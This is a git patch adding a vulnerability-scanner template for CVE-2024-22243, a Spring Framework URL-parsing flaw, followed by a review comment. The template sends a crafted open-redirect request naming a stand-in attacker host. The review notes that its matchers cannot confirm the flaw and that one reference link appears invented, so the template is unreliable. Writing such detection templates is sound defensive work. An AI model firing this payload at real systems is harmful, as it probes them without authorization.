From accb9498cee90981aea3d8b9d8576a2137171368 Mon Sep 17 00:00:00 2001 From: Anonymous Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH] Added template for CVE-2024-22243 --- CVE-2024-22243.yaml | 56 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 CVE-2024-22243.yaml diff --git a/CVE-2024-22243.yaml b/CVE-2024-22243.yaml new file mode 100644 index 00000000000..c7a47df3244 --- /dev/null +++ b/CVE-2024-22243.yaml 
@@ -0,0 +1,56 @@ +id: CVE-2024-22243 +info: + name: URL Parsing Vulnerability in Java Spring Framework + author: Sean Pesce + severity: high + description: | + A URL-parsing vulnerability in the Java Spring Framework that affects certain versions. + This issue arises from a specific regex in the UriComponentsBuilder class, leading to + unexpected host name extraction. This can cause security flaws like open redirects or + SSRF if trusted host names are used for authorization. + remediation: | + Upgrade to a patched version of the Spring Framework where this vulnerability is resolved. + Avoid using the vulnerable methods for parsing URLs, or implement custom validation to + ensure the host name extracted is as expected. Regularly review and update dependencies to + prevent such vulnerabilities. + reference: + - https://github.com/spring-projects/spring-framework/issues/22243 + - https://security.netapp.com/advisory/ntap-20240524-0001/ + - https://spring.io/security/cve-2024-22243 + - http://seclists.org/fulldisclosure/2024/Sep/24 + - https://github.com/hinat0y/Dataset1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2024-22243 + cwe-id: CWE-601 + epss-score: 0.00061 + epss-percentile: 0.27896 + +http: + - raw: + - | + GET /redirect?url=http://attacker%5Bexample.com@victim.com/ HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + part: header + words: + - "Location: http://attacker%5Bexample.com@victim.com/" + - type: regex + part: body + regex: + - "http://victim.com" # Detects the incorrect parsing of the host name + - type: word + part: header + words: + - "Location: http://" # Matching any external redirection URL pattern + - type: word + part: header + words: + - "Location: http://attacker%5Bexample.com@" # Specifically targeting crafted attacker URL +
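Review bot: The `regex` matcher on `part: body` near the end of the `matchers` list requires `http://victim.com` in the body of a 302 response, and because `matchers-condition: and` is set, a redirect with an empty or differently worded body will never match. The three `word` matchers on `part: header` also overlap: `"Location: http://"` and `"Location: http://attacker%5Bexample.com@"` are both prefixes of the first one, so they add nothing. Every matcher only checks that the request's `url` value is echoed back in `Location`, which any redirect endpoint does regardless of how `UriComponentsBuilder` extracted the host, so a match does not show that the affected Spring parsing path is present. Suggest dropping the body regex and the two redundant word matchers, and stating in `description` that the `/redirect` path and `url` parameter are assumed and that a match indicates a reflected redirect rather than a confirmed framework version. The first `reference` entry, `spring-framework/issues/22243`, reuses the CVE's numeric part as an issue number and should be checked before merging.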